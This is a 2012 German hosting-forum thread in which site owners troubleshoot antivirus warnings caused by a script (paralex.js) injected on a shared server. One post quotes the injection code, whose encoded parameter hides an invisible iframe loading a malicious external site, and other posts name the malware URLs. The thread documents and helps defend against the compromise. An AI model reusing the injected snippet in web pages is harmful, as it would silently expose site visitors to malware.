Malware-Warnung

Dieses Thema im Forum "Ausfälle" wurde erstellt von Pierre70, 13. Mai 2012.

  1. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    Hallo zusammen,

    keine Ahnung, ob ich mit meinem Anliegen im richtigen Forum bin....

    Ich habe auf diversen Webseiten meines Hosters (celeros) auf einem bestimmten Sever seit 3-4 Wochen immer eine Malware-Warnung diverser AntiViren-Programme (in meinem Falle Avast).
    Anfangs tat mein Hoster das ab mit "meine Seiten haben Schadcode oder sind komprommitiert worden"... doch blöderweise erscheinen die Warnungen auch beim Aufruf der Confixx-Seite des Hosters (Servers).

    Es handelt sich um die Domains tippelsberg.de und hg-sys.de / bzw. um den Server "lennox.servertools24.de"

    Die Warnmeldung erscheint nicht direkt bei Aufruf der ersten Seiten, sondern erst bei "Aktualisieren (F5)" oder Aufruf einer weiteren Seite innerhalb der Web-Präsenz.
    Beim Aufruf der Confixx-Seite (lennox) erscheint die Meldung sofort.

    Der Hoster kommt nicht wirklich in Wallung, das Problem zu beheben. Übrigens wurde das Problem auch schon von anderen Besuchern meiner Webseite bemerkt, siehe hier: http://www.mozilo.de/forum/viewtopic.php?f=19&t=1437 (ab Seite 3)

    Kann mir/uns jemand helfen? Ist das ein Confixx-Fehler? Denn an meinen Seiten kann es nicht liegen.
    Dasselbe CMS läuft nämlich auch auf anderen Servern des Hosters, und da kommen die Warnmeldungen nicht! (Siehe z.B. labor7.de/schreiner2)

    Gruß aus Bochum,
    Thorsten
     
  2. chichy

    chichy New Member

    Registriert seit:
    15. Juli 2009
    Beiträge:
    165
    Ort:
    data center
    AW: Malware-Warnung

    Es finden keine Probleme beim aufrufen der Webseiten statt (Avast).
    Schon in betracht gezogen, dass der heimische Rechner infiziert ist?
     
  3. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    AW: Malware-Warnung

    Ja, klar. Aber 9 verschiedene Rechner zeigen das Phänomen an?
     
  4. Mr. Brain

    Mr. Brain Erfahrener Benutzer

    Registriert seit:
    13. Mai 2005
    Beiträge:
    2.289
    Ort:
    Frankfurt am Main
    Firmenname:
    Welcome 2 Inter.Net
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Es ist

    Code:
    <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly9jeWJlci1mb3guY29tLzY2Ni9pbmRleC5waHAnIHN0eWxlPSdkaXNwbGF5OiBub25lJz4=;t=741'></script>
    im Sourcecode zu finden. In der Tat wird das nicht immer im Sourcecode geladen.
     
  5. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    AW: Malware-Warnung

    @ Mr. Brain
    Erscheint aber beim ersten Aufruf der Webseiten nicht, erst bei Aktualisierung bzw. Aufruf einer weiteren Seite der Präsenz. Und beim Aufruf der Confixx-Seite (lennox.servertools24.de) direkt.

    Dieses "paralex.js" scheint mir sehr auf Confixx (Parallels) zu schließen.
     
  6. mtexx.com

    mtexx.com Eingetragener Provider

    Registriert seit:
    25. August 2010
    Beiträge:
    111
    Firmenname:
    MTEXX IT Services GmbH
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Das Script lädt Code von der Seite "cyber-fox.com" nach, die laut diversen Virenscannern tatsächlich schädlichen Code (JS:ScriptIP-inf [Trj]) enthält. Eventuell einfach mal "paralex.js" suchen & löschen und nach der Schwachstelle suchen, über die der Code nachgeladen werden konnte. Hier wird auf der Confixx Seite keine Warnmeldung ausgegeben.

    MfG
     
    Zuletzt bearbeitet: 14. Mai 2012
  7. Web-Service4U

    Web-Service4U Eingetragener Provider

    Registriert seit:
    8. September 2010
    Beiträge:
    241
    Geschlecht:
    männlich
    Ort:
    Pasewalk
    Firmenname:
    Web-Service4U
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Guten Morgen,

    ich kann die Malware-Meldung von Avast für lennox.servertools24.de bestätigen. Wende Dich bitte an den Seitenbetreiber, da nur dieser den Schadcode entfernen kann.

    Internette Grüße
    Reiko
     
  8. Optimate-Server

    Optimate-Server Eingetragener Provider

    Registriert seit:
    10. Juni 2004
    Beiträge:
    3.646
    Geschlecht:
    männlich
    Ort:
    Heusenstamm
    Firmenname:
    Optimate-Server
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Was ich aber nicht verstehen kann:
    Hier macht ein netter, höflicher Mensch einen Thread auf und fragt höflich, ob andere das Problem bestätigen können und sofort wird er unhöflich angegangen. Das muss in der Tat nicht sein!!
    Und das der Threadstarter nicht daneben liegt, wie chichy anfangs behauptet, dass sein Rechner lokal infiziert sei, zeigt sich ja nun auch.
     
  9. mtexx.com

    mtexx.com Eingetragener Provider

    Registriert seit:
    25. August 2010
    Beiträge:
    111
    Firmenname:
    MTEXX IT Services GmbH
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Naja, beide haben sich nicht gerade "Nettiquette" verhalten... Jetzt ist nur die Frage, was Avast hier für einen Infekt anzeigt, bei mir bleibt die Meldung bei "lennox.servertools24.de" aus (ebenfalls fehlt hier das eingebundene Script) und auch Virustotal meint dazu "0/24": https://www.virustotal.com/url/8df0...9e3828d609435406f3c5d1b3816f080aa73/analysis/. Kann jemand mal die genaue Meldung von Avast posten?

    MfG
     
  10. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    AW: Malware-Warnung

    So, der Hoster hat sich auf meine Support-Mail noch nicht gemeldet.
    Das Problem besteht weiterhin.

    Andere Webseiten, die auf dem Server lennox.servertools24.de liegen, haben dasselbe Problem. Einfach mal nach "lennox.servertools24.de" googeln (sind aber auch viele Confixx-Blank-Seiten vorhanden).

    Das CMS, das ich auf lennox für verschiedene Webseiten nutze, wird auch auf anderen Servern des Hosters von mir eingesetzt, so u.a. auf dem Server "lex" mit den Webseiten labor7.de/cnd und labor7.de/schreiner2 (2 Seiten, die im Kundenauftrag erstellt werden).
    Bei diesen Seiten erscheint keine Malware-Warnung! Ebenso nicht auf wion-beats.de (selbes CMS, anderer Hoster).

    Ich kann nicht ansatzweise etwas "verdächtiges" im Sourcecode meiner Seiten entdecken...

    Es ist echt zum Verzweifeln...
     
    Zuletzt von einem Moderator bearbeitet: 14. Mai 2012
  11. Web-Service4U

    Web-Service4U Eingetragener Provider

    Registriert seit:
    8. September 2010
    Beiträge:
    241
    Geschlecht:
    männlich
    Ort:
    Pasewalk
    Firmenname:
    Web-Service4U
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Ich kann auch bestätigen, dass die Mailware-Warnung für lennox.server... von Avast mal kommt und mal nicht. Ist nicht zuverlässig reproduzierbar.

    Die genaue Meldung:
    Bösartige Webseite blockiert
    avast! Netzwerk-Schutz hat eine schädliche Webseite oder Datei blockiert.
    Infektions-Details:
    URL: "http://cyber-fox.com/666/index.php"
    Pozess: .../iexplore.exe
    Infektion: URL:Mal

    Interessant: tippelsberg.de zeigt ein ähnliches Verhalten, aber auch nicht bei jedem Aufruf. Zusätzlich zu oben zitierter Meldung warnt Avast dort auch vor einem Trojanischen Pferd.

    Es gibt da also definitiv ein Problem.

    Internette Grüße
    Reiko
     
    Zuletzt bearbeitet: 14. Mai 2012
  12. Sippi

    Sippi New Member

    Registriert seit:
    29. Januar 2007
    Beiträge:
    109
    AW: Malware-Warnung

    Diese Meldung erhalte ich von G-Data:
    Vielleicht hilft Dir diese Meldung weiter für deinen Hoster.

    Viel Glück!
     
  13. Watzmann

    Watzmann New Member

    Registriert seit:
    14. Mai 2012
    Beiträge:
    3
    AW: Malware-Warnung

    Hallo,

    ich bin ebenfalls bei Celeros auf "lennox.servertools24.de" und kann den Aufruf von "paralex.js" bestätigen. Das Script benutzt "document.write()", und als Sofortmaßnahme könnte man die Original-Funktion mit einem eigenen Script lahmlegen:

    <script type="text/javascript">
    document.write=function(){};
    </script>

    Bei mir wurden diese beiden Seiten nachgeladen:
    http://cyber-fox.com/666/index.php
    http://hassen23.jumpingcrab.com/t/ec97cf9ec3df9458cf3c69fc7cb9bbb9

    Weiß jemand, wie man möglichst genau herausbekommt, welche Freundlichkeiten da für Besucher bereitgehalten werden?

    Danke für Hinweise!
     
  14. [MOD] SRo

    [MOD] SRo Member

    Registriert seit:
    27. Februar 2011
    Beiträge:
    165
    Ort:
    Berlin
    AW: Malware-Warnung

    Hallo,

    ich habe hier einige unpassende Beiträge entfernt.

    Bitte bleibt alle beim Thema, damit die berechtigte Anfrage des TO geklärt werden kann.

    Gruß
     
  15. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    AW: Malware-Warnung

    Vielen Dank für die konstruktiven Hilfestellungen :)

    @ Watzmann:
    Die Idee mit dem eigenen Script funktioniert soweit, dass Avast jetzt nicht mehr meckert (eben getestet auf der tippelsberg.de)
    Der Code (paralex.js) wird aber weiterhin geladen.

    1. Beim ersten Aufruf der tippelsberg.de ist alles "normal" (bitte Sourcecode ganz unten anschauen)
    2. Nach einmaliger (!) Aktualisierung (oder Besuch einer weiteren Seite, z.B. "Infos") bitte Sourcecode nochmal unten anschauen, da erscheint das Java wieder.

    Ich habe übrigens noch herausgefunden, dass die Malware-Meldung durch Avast nicht mehr erscheint, wenn ich einmal "infiziert" wurde und den Browser-Cache nicht geleert wurde.
    Wenn ich den Browser-Cache (FF und IE) geleert habe, erscheint das Phänomen wieder...
    Soviel also dazu, dass die Antivirensoftware mal anschlägt und mal nicht.

    Fakt ist aber auch, dass ich nach Besuch einer "infizierten" Seite - als Beispiel tippelsberg.de - ohne Leeren des Browser-Cache zwar keine Meldung der Software mehr bekomme, der JavaCode aber weiterhin auf anderen Seiten - z.B. lennox.servertools24.de vorhanden ist...

    Komische Sache das. Ich werde den Hoster nochmals kontaktieren, bislang hat er sich leider noch nicht gemeldet.

    Danke für Eure Hilfe und Gruß aus Bochum,
    Thorsten
     
  16. Aniel

    Aniel New Member

    Registriert seit:
    14. Mai 2012
    Beiträge:
    3
    AW: Malware-Warnung

    Dito. Auch meine Seite ist betroffen. Ich finde es unsäglich, dass Celeros nicht mal was unternimmt! Und das scheinbar schon seit Längerem! Bin erst seit nem Jahr dort und möchte nicht schon wieder wechseln, aber wenn das morgen nicht behoben ist, seh ich keine andere Möglichkeit.
     
  17. Watzmann

    Watzmann New Member

    Registriert seit:
    14. Mai 2012
    Beiträge:
    3
    AW: Malware-Warnung

    Stimmt, aber die "paralex.js" macht nur eins, sie entschlüsselt aus ihrem eigenen Searchpart die URL des Iframes, und schreibt diesen dann in die Seite. Wenn sie nicht mehr schreiben kann, ist an der Stelle Schluss.

    Ich hatte heute morgen auch eine Mail geschrieben. Das werden die schon ernst nehmen, wenn klar ist, dass es an ihnen liegen muss ...

    Gruß, Watzmann
     
  18. Aniel

    Aniel New Member

    Registriert seit:
    14. Mai 2012
    Beiträge:
    3
    AW: Malware-Warnung

    Ich verstehe die technischen Hintergründe noch nicht ganz. Wo liegt die paralex.js? Kann man den Zugriff vielleicht über die .htaccess unterbinden? Wo kommen die Cookies her? Was bewirken die Hacker mit dem Angriff? Und wieso unternimmt Celeros nichts?
     
  19. Pierre70

    Pierre70 Erfahrener Benutzer

    Registriert seit:
    20. Oktober 2004
    Beiträge:
    537
    Ort:
    Bochum
    AW: Malware-Warnung

    @ Watzmann:
    Ich habe Deinen Script jetzt auf den betroffenden Seiten eingefügt. Avast hält erstmal die Klappe ;-)
    Vielen Dank dafür!

    @ Aniel:
    Das frage ich mich auch. Also wo genau das "paralex.js" liegt... und was wirklich passiert, wenn man keine (aktuelle) Antivirensoftware installiert hat.
    Ist für einen Webseitenbetreiber natürlich höchst unangenehm, da die Besucher meinen, ich persönlich würde ihren Rechner infizieren wollen. Höchst frustrierend!

    Übrigens, wenn ich eine "verseuchte" Seite (in meinem Falle ein Spielplatz, um Plugins zu testen auf der hg-sys.de/mozilo4) aufrufe, zeigt mir das Firefox-Plugin "HTML-Validator" an, dass sich wohl ein (i)Frame auf die Seite schiebt, welches ansonsten nicht vorhanden ist (siehe Screenshot unten).

    Leider noch keine Antwort vom Hoster. (So langsam werde ich knatschig).

    http://tgbo.de/pics/lennox-malware-frame.jpg
     
  20. Celeros.de

    Celeros.de Eingetragener Provider

    Registriert seit:
    5. Januar 2009
    Beiträge:
    396
    Firmenname:
    Celeros Online KG
    Anbieterprofil:
    Klick
    AW: Malware-Warnung

    Wir möchten diesen Beitrag einmal zum Anlass für eine Kommentierung nehmen. Wir sind uns des Problems sehr wohl bewusst und sind nach wie vor an der Problemlösung dran. Wie unsere Kollegen auch schon erkannt haben, ist das Problem extrem schwer reproduzierbar und daher arbeiten wir noch nach wie vor an einer Lösung.

    Sobald das Problem behoben wurde, geben wir dies natürlich umgehend per Newsletter bekannt.
     

Diese Seite empfehlen